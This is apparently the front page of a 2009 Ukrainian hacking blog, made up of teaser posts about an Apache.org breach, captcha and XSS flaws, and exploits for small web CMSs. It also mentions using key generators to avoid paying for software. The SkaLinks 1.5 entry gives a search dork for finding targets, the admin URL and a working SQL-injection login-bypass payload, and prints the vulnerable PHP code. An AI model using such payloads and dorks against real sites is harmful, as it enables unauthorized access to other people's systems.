Взлом Apache.org –> is owned ;) (How to)

Всі вже напевно знають про що йде мова та й офіціальне підтвердження було, але я розповім як все було насправді з боку атакуючого=)

Всі вже напевно знають про що йде мова та й офіціальне підтвердження було, але я розповім як все було насправді з боку атакуючого=)
як за любий крутий скрипт, просять гроші ( але в нас ж їх немає, тому користуємося готовими ,безкоштовними засобами – генераторами ключиків.
Read more…
Існує декілька типів вразливостей каптчі:
SMF ] MemberAwards 1.0.2 exploit
eLwaux(c)uasc && antichat 2009
thx: Grey && mailbrush
Read more…
В травні місяці довелось мені переглянути вихідний код одного листа на укр неті. І побачив я одну цікаву особливість, а саме, текст листа був у такому вигляді:
Вже в голові закрутились думки про XSS =) . Покопався ще трохи, та дійшов до такого коду:
Read more…
Вразливості у цій CMS були найдені мною ще 21.12.2008. А експлойт я таки не опублікував на цьому блозі.
публікую
http://uasc.org.ua/files/eliteCMSexpl.pl.txt
{referrer_detector}
Вразливості Rash Quote Management System
Офіційний сайт: http://rqms.sourceforge.net
Версія <=1.2.2
Вразливість знайдено: Dimi4
Dork: “Rash Version: 1.2.1”
Read more…
Продукт : SkaLinks
Версія : 1.5
Dork : “Powered by SkaLinks “
Офіційний сат: http://www.skalinks.com/
Вразливість знайдена: Dimi4
Тип: SQL-injection, Auth Bypass
Вразливість існує через недостатню фільтрацію вхідних даних у функціїї авторизацїї
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1′ OR 1=1/*Вразлива функція:
function IsAdmin( ) { $table_name = $this->m_AdminsTable; $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`=’".$_COOKIE['adminname']."’ AND `Password`=’".$_COOKIE['pwd']."’"); if ( !$res ) { return 0; } else { return $res; } }(c) Dimi4, 2009 greetz to UASC, antichat
Останні коментарі